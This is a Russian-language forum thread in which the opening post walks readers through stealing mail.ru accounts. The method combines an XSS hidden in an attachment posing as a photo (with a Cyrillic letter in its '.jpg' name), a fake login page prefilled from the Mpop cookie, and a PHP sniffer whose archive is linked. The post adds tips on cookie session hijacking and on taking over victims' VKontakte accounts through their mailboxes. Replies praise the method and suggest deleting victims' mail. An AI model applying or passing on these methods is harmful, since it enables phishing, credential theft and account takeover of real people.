|
mail.ru: XSS + фейк (2 в 1)
Всем привет :)
Возможно байан, и всёже... XSS нашёл не я, нашёл вот кто http://webxakep.net/articles/articles-internet/1601-krazha-cookies-na-mail.ru.html но там описана тупо XSS а мы сейчас додумаем сами, как сделать всё поумнее... /*Кстати хочу сказать что почему-то не у всех это работает, у некоторых при отправке атача <script> заменяется на <xscript> возможно это зависит от браузера, у меня опера 9.62 и всё норм*/ Дальше идёт строго моя импровизация :) С XSS проблем не будет, надо подумать насчёт фейка... Мы будем выводить страницу входа, надо чтобы мыло отображалось в поле "Имя" ну как стандартный мэйловский вход, для этого надо отпарсить куку "Mpop". Быстро в гуголе нашёл скрипт и взялся за работу /*Час спустя :) */ Сделал, из кук читается логин, домен и вводится в форму, также при нажатии на кнопку сабмита изменяется action формы, чтобы в опере не палился сниффер при наводе на кнопку :) URL сниффера надо прописать в функцию x3k_get_action() - найдёте её через Ctrl+F :) (это файл фото) Автор статьи что я указал выше рекомендует использовать имя файла с расширением .img но это палево, хоть и не большое, но палево, и зачем палиться если этого можно избежать. Способ прибежал в голову секунда за 15 :) Изменяем формат файла на .jpg Но буква p это не английская ПЭ а русская ЭР, таким образом всё хорошо :) Но вы возможно придумаете для экономии времени такой способ - заходить в "Отправленные" и перенаправлять время следующей жертве, не советую... При первой отправке если мы отправили "фото.jpg" то он так и придёт жертве, а при перенаправке он превратиться в "foto.jrg" а нам этого не надо, поэтому пишите каждый раз письмо заново. Код:
http://rapidshare.com/files/171369388/mail.ru_sniff_fake.rar.html.htaccess - запрещает доступ к логу из веба mail-sniffer.log - сюда будут идти куки с XSS и данные с фейка mail-sniffer.php - сам сниффер который всё обрабатывает S000001436.jрg - "кагбе" фотография. Она весит 22кб, если вам кажется этого мало для фотографии, можете дополнить текстом Код HTML:
<noscript><!-- много разного мусора на пару десятков/сотен кб --></noscript>А! Вспомнил! Если жертва не повелась на фейк, пришли только куки, не всё потеряно, прём на вконтакт (все знают что это, не надо объяснять?) высылаем пасс на мыло (98% жертв зареганы на вконтакте) нам приходит пасс, в 85% случаев пасс подходит к мылу, если не на вконтакте, порыскайте почту, должны быть письма с разными регистрациями и высыланиями паролей :) Ах да! Ещё! Если пришли только куки, то удаляйте всё кроме "Mpop" эта кука самая главная и с её помощью вы сможете лазить по всем сервисам mail.ru (чаты, знакомства, игры) если вы оставите ещё какую-то куку то есть вероятность что куда-то вас не пустят А! Ещё! В PHP скрипте сниффера защита от школьников, так что не забудьте поправить Ага! Ещё! Зайдите в "фотографию" и в функции "x3k_get_action()" измените URL сниффера Ну и ещё... На файл mail-sniffer.log должны быть права на запись Вроде-бы всё Видео тем кто не догнал :rolleyes: Код:
http://rapidshare.com/files/171401947/mail.ru_xss_sniff.rar.html |
На яндексе тоже похожая была, там алерты вылетали даже из txt кажись.
Молодец, +++ |
Тама кстате в PHP скрипте
header("Location: http://win.mail.ru/cgi-bin/movemsg?remove&id=$id"); Вот если 2 раза заставить жертву зайти по этой ссыле письмо удалиться полностью, но я игрался, игрался с картинками на JS, не получилось, не моё это :( |
Перезалейте куда-нить..))
|
Fepsis, http://depositfiles.com/files/rbmgdj9vw
Перенесите кто-то тему в E-Mail ато я чёто тупанул |
Код:
========================== |
Молодец!!! Хорошая статья =))
Но сейчас будет куча вопросов... Так что лучше видео запиши =) |
Tigger, тож думал над этим, щас запишу :)
|
Молодец интересно.
|
Снял видео, но тама смареть нечего, щас пойдут вопросы "А я когда открываю 192.168.0.1/O_o у меня пишет невозможно отобразить" и "А где скачать VMware и возможно-ли через неё ломать акки вконтакте" Х_Х
|
| Время: 10:39 |